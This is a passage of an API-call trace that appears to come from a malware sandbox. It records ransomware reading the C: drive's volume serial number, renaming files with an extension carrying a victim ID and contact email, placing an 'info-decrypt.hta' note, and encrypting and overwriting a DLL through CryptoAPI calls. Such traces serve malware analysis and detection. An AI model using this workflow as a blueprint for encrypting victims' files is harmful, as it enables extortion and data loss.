This=0x6029ea0, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0206.271] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.271] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0206.271] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0206.271] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0206.271] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.272] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x60249b0) returned 0x0 [0206.272] WbemLocator:IUnknown:QueryInterface (in: This=0x60249b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0206.272] WbemLocator:IClassFactory:CreateInstance (in: This=0x60249b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x60273c0) returned 0x0 [0206.272] WbemLocator:IUnknown:Release (This=0x60249b0) returned 0x0 [0206.272] WbemLocator:IUnknown:QueryInterface (in: This=0x60273c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x60273c0) returned 0x0 [0206.272] WbemLocator:IUnknown:QueryInterface (in: This=0x60273c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0206.272] WbemLocator:IUnknown:AddRef (This=0x60273c0) returned 0x3 [0206.272] WbemLocator:IUnknown:QueryInterface (in: This=0x60273c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0206.272] WbemLocator:IUnknown:QueryInterface (in: This=0x60273c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0206.273] WbemLocator:IUnknown:QueryInterface (in: This=0x60273c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0206.273] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0206.273] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0206.273] WbemLocator:IUnknown:QueryInterface (in: This=0x60273c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0206.273] WbemLocator:IUnknown:Release (This=0x60273c0) returned 0x2 [0206.273] WbemLocator:IUnknown:Release (This=0x60273c0) returned 0x1 [0206.273] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0206.273] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0206.273] WbemLocator:IUnknown:QueryInterface (in: This=0x60273c0, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x60273c0) returned 0x0 [0206.273] WbemLocator:IUnknown:AddRef (This=0x60273c0) returned 0x3 [0206.273] WbemLocator:IUnknown:Release (This=0x60273c0) returned 0x2 [0206.273] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ea0, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0206.273] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0206.273] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.273] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x60273d0) returned 0x0 [0206.273] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60273d0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x60336e4) returned 0x0 [0206.513] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5bc74) returned 0x0 [0206.514] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bc74, pProxy=0x60336e4, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0206.514] WbemLocator:IUnknown:Release (This=0xb5bc74) returned 0x1 [0206.514] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5bc94) returned 0x0 [0206.514] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5bc74) returned 0x0 [0206.514] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bc74, pProxy=0x60336e4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0206.514] WbemLocator:IUnknown:Release (This=0xb5bc74) returned 0x2 [0206.514] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x1 [0206.514] CoTaskMemFree (pv=0xbd4a68) [0206.514] WbemLocator:IUnknown:Release (This=0x60273d0) returned 0x0 [0206.514] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5bc94) returned 0x0 [0206.514] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0206.517] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0206.518] WbemLocator:IUnknown:AddRef (This=0xb5bc94) returned 0x3 [0206.518] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0206.521] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0206.669] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5bbf4) returned 0x0 [0206.669] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bbf4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.669] WbemLocator:IUnknown:Release (This=0xb5bbf4) returned 0x3 [0206.669] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0206.669] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0206.669] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5bc7c) returned 0x0 [0206.669] WbemLocator:IRpcOptions:Query (in: This=0xb5bc7c, pPrx=0xb5bc94, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0206.669] WbemLocator:IUnknown:Release (This=0xb5bc7c) returned 0x3 [0206.669] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x2 [0206.670] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0206.670] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0206.670] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x60336e4) returned 0x0 [0206.670] WbemLocator:IUnknown:AddRef (This=0x60336e4) returned 0x4 [0206.670] WbemLocator:IUnknown:Release (This=0x60336e4) returned 0x3 [0206.670] WbemLocator:IUnknown:Release (This=0x60336e4) returned 0x2 [0206.670] SysStringLen (param_1=0x0) returned 0x0 [0206.670] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0206.670] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0206.670] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.670] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0206.670] WbemLocator:IUnknown:AddRef (This=0xb5bc94) returned 0x3 [0206.670] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5bc94) returned 0x0 [0206.670] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x3 [0206.670] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x2 [0206.670] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0206.670] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.671] IWbemServices:GetObject (in: This=0x60336e4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x60287e0, ppCallResult=0x0) returned 0x0 [0206.814] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ea0, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0206.814] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0206.814] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.814] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3681abc*=0, plFlavor=0x3681ac0*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3681abc*=8, plFlavor=0x3681ac0*=0) returned 0x0 [0206.814] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.814] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.814] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3681abc*=8, plFlavor=0x3681ac0*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3681abc*=8, plFlavor=0x3681ac0*=0) returned 0x0 [0206.814] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.814] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL", lpFilePart=0x0) returned 0x40 [0206.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x63 [0206.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0206.815] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3e47200, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x522dc930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x349ed5a0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0206.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0206.815] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0206.815] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll", lpFilePart=0x0) returned 0x40 [0206.815] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\info-decrypt.hta", lpFilePart=0x0) returned 0x44 [0206.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0206.816] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93d20, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x32b93d20, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x32b93d20, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0206.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0206.816] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll", lpFilePart=0x0) returned 0x40 [0206.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0206.816] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), fInfoLevelId=0x0, lpFileInformation=0x36820a0 | out: lpFileInformation=0x36820a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x616b36d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x69000)) returned 1 [0206.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0206.816] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll", lpFilePart=0x0) returned 0x40 [0206.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0206.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0206.816] GetFileType (hFile=0x280) returned 0x1 [0206.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0206.816] GetFileType (hFile=0x280) returned 0x1 [0206.816] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x69000 [0206.818] ReadFile (in: hFile=0x280, lpBuffer=0xb1d14c8, nNumberOfBytesToRead=0x69000, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0xb1d14c8*, lpNumberOfBytesRead=0x6d8edac*=0x69000, lpOverlapped=0x0) returned 1 [0206.845] CloseHandle (hObject=0x280) returned 1 [0206.845] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbe0ad0) returned 1 [0206.846] CryptGenRandom (in: hProv=0xbe0ad0, dwLen=0x10, pbBuffer=0x36825e8 | out: pbBuffer=0x36825e8) returned 1 [0207.453] CryptImportKey (in: hProv=0xbe0ad0, pbData=0x3600dcc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f510) returned 1 [0207.453] CryptContextAddRef (hProv=0xbe0ad0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.453] CryptContextAddRef (hProv=0xbe0ad0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.453] CryptDuplicateKey (in: hKey=0xb7f510, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7fb50) returned 1 [0207.453] CryptContextAddRef (hProv=0xbe0ad0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.453] CryptSetKeyParam (hKey=0xb7fb50, dwParam=0x4, pbData=0x3600eac*=0x1, dwFlags=0x0) returned 1 [0207.453] CryptSetKeyParam (hKey=0xb7fb50, dwParam=0x1, pbData=0x3600e78, dwFlags=0x0) returned 1 [0207.455] CryptEncrypt (in: hKey=0xb7fb50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xb23a4e8*, pdwDataLen=0x6d8ed78*=0x69010, dwBufLen=0x69010 | out: pbData=0xb23a4e8*, pdwDataLen=0x6d8ed78*=0x69010) returned 1 [0207.460] CryptEncrypt (in: hKey=0xb7fb50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3600ed4*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x3600ed4*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0207.461] CryptDestroyKey (hKey=0xb7f510) returned 1 [0207.461] CryptReleaseContext (hProv=0xbe0ad0, dwFlags=0x0) returned 1 [0207.461] CryptReleaseContext (hProv=0xbe0ad0, dwFlags=0x0) returned 1 [0207.461] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll", lpFilePart=0x0) returned 0x40 [0207.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0207.461] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x27c [0207.466] GetFileType (hFile=0x27c) returned 0x1 [0207.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0207.466] GetFileType (hFile=0x27c) returned 0x1 [0207.466] WriteFile (in: hFile=0x27c, lpBuffer=0x36abeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x36abeb0*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0207.467] CloseHandle (hObject=0x27c) returned 1 [0207.468] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 